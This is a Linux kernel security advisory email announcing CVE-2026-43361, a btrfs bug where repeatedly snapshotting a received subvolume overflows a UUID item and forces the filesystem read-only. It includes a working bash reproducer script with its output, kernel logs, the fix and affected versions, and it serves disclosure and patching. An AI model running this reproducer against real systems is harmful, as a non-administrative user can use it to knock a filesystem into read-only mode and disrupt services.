From mboxrd@z Thu Jan 1 00:00:00 1970 Received: from smtp.kernel.org (aws-us-west-2-korg-mail-1.web.codeaurora.org [10.30.226.201]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by smtp.subspace.kernel.org (Postfix) with ESMTPS id E2A453E0C52 for ; Fri, 8 May 2026 14:22:23 +0000 (UTC) Authentication-Results: smtp.subspace.kernel.org; arc=none smtp.client-ip=10.30.226.201 ARC-Seal:i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1778250144; cv=none; b=mp82zFZZLX4qJB0ERwM+QpShoCIBqEp45TdFn/zStPW/sofgKS6Su6+YPw1RE5/c5VPEOvuOHq2QS4QMMaUrgFBZYUBJ8JxxeXDmpIMD+A/j89BbgWRi9NZLKDivTVW27Sb5L0YzNf8w7XD/zaDBMKiRHIRQXRRpzvq9Q442G8U= ARC-Message-Signature:i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1778250144; c=relaxed/simple; bh=V33TMu0C99lV6pLNIkXsKdJdUN6WPyE1qTE0t80XuUc=; h=From:To:Cc:Subject:Date:Message-ID:MIME-Version; b=UKSLlPzKWTG287dKG9H9XMpbVEH5Q2EUjHH+NS7HkbHR/vRw7crk92Gq2zDNwRuiNL530NdGOsQd0UoyQ1EynIqxGAS/+cZ9PYn/WePERSrzI40yr+IhZmqKGgz6+EqFWZ9bkx6TXg1tuNyz6J/QIfTp/lqen2EKpM2w/eJE91E= ARC-Authentication-Results:i=1; smtp.subspace.kernel.org; dkim=pass (1024-bit key) header.d=linuxfoundation.org header.i=@linuxfoundation.org header.b=z4iOUjCU; arc=none smtp.client-ip=10.30.226.201 Authentication-Results: smtp.subspace.kernel.org; dkim=pass (1024-bit key) header.d=linuxfoundation.org header.i=@linuxfoundation.org header.b="z4iOUjCU" Received: by smtp.kernel.org (Postfix) with ESMTPSA id 15857C2BCB0; Fri, 8 May 2026 14:22:22 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=linuxfoundation.org; s=korg; t=1778250143; bh=V33TMu0C99lV6pLNIkXsKdJdUN6WPyE1qTE0t80XuUc=; h=From:To:Cc:Subject:Date:Reply-To:From; b=z4iOUjCUBwl5spFwpKijcH6LpPkDy6zCzFDurzBA1E2o20AmtP0hx4q0SEkTOS+Ps S14k0tPMtEhFW2NrxB6O2dIq8HPwk3nl3HhD4FkLLLXseN79Hzqi+afgqWybf2/zs3 Yv61jyzhH1/Nk6BFXOJi4c2HEXHiqyiJq2UPvB0k= From: Greg Kroah-Hartman To: linux-cve-announce@vger.kernel.org Cc: Greg Kroah-Hartman Subject: CVE-2026-43361: btrfs: fix transaction abort when snapshotting received subvolumes Date: Fri, 8 May 2026 16:21:30 +0200 Message-ID: <2026050826-CVE-2026-43361-ffe2@gregkh> X-Mailer: git-send-email 2.54.0 Reply-To: , Precedence: bulk X-Mailing-List: linux-cve-announce@vger.kernel.org List-Id: List-Subscribe: List-Unsubscribe: MIME-Version: 1.0 X-Developer-Signature: v=1; a=openpgp-sha256; l=9089; i=gregkh@linuxfoundation.org; h=from:subject:message-id; bh=orYYltOqAQrjvl6xAbF3LWhoTdINauyNHGPLS/ASVaI=; b=owGbwMvMwCRo6H6F97bub03G02pJDJl/P6YxbIq+dH/rJH8GsTOPry39mTDnSU2L94G1S66Xm ellPFul1hHLwiDIxCArpsjyZRvP0f0VhxS9DG1Pw8xhZQIbwsUpABNRY2GYnxyud+Xwfj057rXO DkUKWSrJG0ttGebXOFWklD3du1ds/pOHmcHvJ/WtrZkJAA== X-Developer-Key: i=gregkh@linuxfoundation.org; a=openpgp; fpr=F4B60CC5BF78C2214A313DCB3147D40DDB2DFB29 Content-Transfer-Encoding: 8bit From: Greg Kroah-Hartman Description =========== In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction abort when snapshotting received subvolumes Currently a user can trigger a transaction abort by snapshotting a previously received snapshot a bunch of times until we reach a BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we can store in a leaf). This is very likely not common in practice, but if it happens, it turns the filesystem into RO mode. The snapshot, send and set_received_subvol and subvol_setflags (used by receive) don't require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user could use this to turn a filesystem into RO mode and disrupt a system. Reproducer script: $ cat test.sh #!/bin/bash DEV=/dev/sdi MNT=/mnt/sdi # Use smallest node size to make the test faster. mkfs.btrfs -f --nodesize 4K $DEV mount $DEV $MNT # Create a subvolume and set it to RO so that it can be used for send. btrfs subvolume create $MNT/sv touch $MNT/sv/foo btrfs property set $MNT/sv ro true # Send and receive the subvolume into snaps/sv. mkdir $MNT/snaps btrfs send $MNT/sv | btrfs receive $MNT/snaps # Now snapshot the received subvolume, which has a received_uuid, a # lot of times to trigger the leaf overflow. total=500 for ((i = 1; i <= $total; i++)); do echo -ne "\rCreating snapshot $i/$total" btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null done echo umount $MNT When running the test: $ ./test.sh (...) Create subvolume '/mnt/sdi/sv' At subvol /mnt/sdi/sv At subvol sv Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system And in dmesg/syslog: $ dmesg (...) [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252! [251067.629212] ------------[ cut here ]------------ [251067.630033] BTRFS: Transaction aborted (error -75) [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235 [251067.632851] Modules linked in: btrfs dm_zero (...) [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full) [251067.646165] Tainted: [W]=WARN [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs] [251067.649984] Code: f0 48 0f (...) [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292 [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3 [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750 [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820 [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0 [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5 [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000 [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0 [251067.661972] Call Trace: [251067.662292] [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs] [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs] [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs] [251067.665238] ? _raw_spin_unlock+0x15/0x30 [251067.665837] ? record_root_in_trans+0xa2/0xd0 [btrfs] [251067.666531] btrfs_mksubvol+0x330/0x580 [btrfs] [251067.667145] btrfs_mksnapshot+0x74/0xa0 [btrfs] [251067.667827] __btrfs_ioctl_snap_create+0x194/0x1d0 [btrfs] [251067.668595] btrfs_ioctl_snap_create_v2+0x107/0x130 [btrfs] [251067.669479] btrfs_ioctl+0x1580/0x2690 [btrfs] [251067.670093] ? count_memcg_events+0x6d/0x180 [251067.670849] ? handle_mm_fault+0x1a0/0x2a0 [251067.671652] __x64_sys_ioctl+0x92/0xe0 [251067.672406] do_syscall_64+0x50/0xf20 [251067.673129] entry_SYSCALL_64_after_hwframe+0x76/0x7e [251067.674096] RIP: 0033:0x7f2a495648db [251067.674812] Code: 00 48 89 (...) [251067.678227] RSP: 002b:00007ffc5aa57840 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 [251067.679691] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f2a495648db [251067.681145] RDX: 00007ffc5aa588b0 RSI: 0000000050009417 RDI: 0000000000000004 [251067.682511] RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000 [251067.683842] R10: 000000000000000a R11: 0000000000000246 R12: 00007ffc5aa59910 [251067.685176] R13: 00007ffc5aa588b0 R14: 0000000000000004 R15: 0000000000000006 [251067.686524] [251067.686972] ---[ end trace 0000000000000000 ]--- [251067.687890] BTRFS: error (device sdi state A) in create_pending_snapshot:1907: errno=-75 unknown [251067.689049] BTRFS info (device sdi state EA): forced readonly [251067.689054] BTRFS warning (device sdi state EA): Skipping commit of aborted transaction. [251067.690119] BTRFS: error (device sdi state EA) in cleanup_transaction:2043: errno=-75 unknown [251067.702028] BTRFS info (device sdi state EA): last unmount of filesystem 46dc3975-30a2-4a69-a18f-418b859cccda Fix this by ignoring -EOVERFLOW errors from btrfs_uuid_tree_add() in the snapshot creation code when attempting to add the BTRFS_UUID_KEY_RECEIVED_SUBVOL item. This is OK because it's not critical and we are still able to delete the snapshot, as snapshot/subvolume deletion ignores if a BTRFS_UUID_KEY_RECEIVED_SUBVOL is missing (see inode.c:btrfs_delete_subvolume()). As for send/receive, we can still do send/receive operations since it always peeks the first root ID in the existing BTRFS_UUID_KEY_RECEIVED_SUBVOL (it could peek any since all snapshots have the same content), and even if the key is missing, it falls back to searching by BTRFS_UUID_KEY_SUBVOL key. A test case for fstests will be sent soon. The Linux kernel CVE team has assigned CVE-2026-43361 to this issue. Affected and fixed versions =========================== Issue introduced in 3.12 with commit dd5f9615fc5c5e8d3751aab3a17b92768fb1ce70 and fixed in 6.1.167 with commit 9a9227b488ffb7cdbb5d930a01fc6956c05ba61a Issue introduced in 3.12 with commit dd5f9615fc5c5e8d3751aab3a17b92768fb1ce70 and fixed in 6.6.130 with commit 6bce705b699cba9afccb996c77d194fe003dfa2a Issue introduced in 3.12 with commit dd5f9615fc5c5e8d3751aab3a17b92768fb1ce70 and fixed in 6.12.78 with commit e3d8efc157bc590457d3e31da403af1a221643d6 Issue introduced in 3.12 with commit dd5f9615fc5c5e8d3751aab3a17b92768fb1ce70 and fixed in 6.18.19 with commit bac55dde8efa457e769c934fd88a63f2141ba238 Issue introduced in 3.12 with commit dd5f9615fc5c5e8d3751aab3a17b92768fb1ce70 and fixed in 6.19.9 with commit 770af8e465c2c3de528f85e840eab462dd41542b Issue introduced in 3.12 with commit dd5f9615fc5c5e8d3751aab3a17b92768fb1ce70 and fixed in 7.0 with commit e1b18b959025e6b5dbad668f391f65d34b39595a Please see https://www.kernel.org for a full list of currently supported kernel versions by the kernel community. Unaffected versions might change over time as fixes are backported to older supported kernel versions. The official CVE entry at https://cve.org/CVERecord/?id=CVE-2026-43361 will be updated if fixes are backported, please check that for the most up to date information about this issue. Affected files ============== The file(s) affected by this issue are: fs/btrfs/transaction.c Mitigation ========== The Linux kernel CVE team recommends that you update to the latest stable kernel version for this, and many other bugfixes. Individual changes are never tested alone, but rather are part of a larger kernel release. Cherry-picking individual commits is not recommended or supported by the Linux kernel community at all. If however, updating to the latest release is impossible, the individual changes to resolve this issue can be found at these commits: https://git.kernel.org/stable/c/9a9227b488ffb7cdbb5d930a01fc6956c05ba61a https://git.kernel.org/stable/c/6bce705b699cba9afccb996c77d194fe003dfa2a https://git.kernel.org/stable/c/e3d8efc157bc590457d3e31da403af1a221643d6 https://git.kernel.org/stable/c/bac55dde8efa457e769c934fd88a63f2141ba238 https://git.kernel.org/stable/c/770af8e465c2c3de528f85e840eab462dd41542b https://git.kernel.org/stable/c/e1b18b959025e6b5dbad668f391f65d34b39595a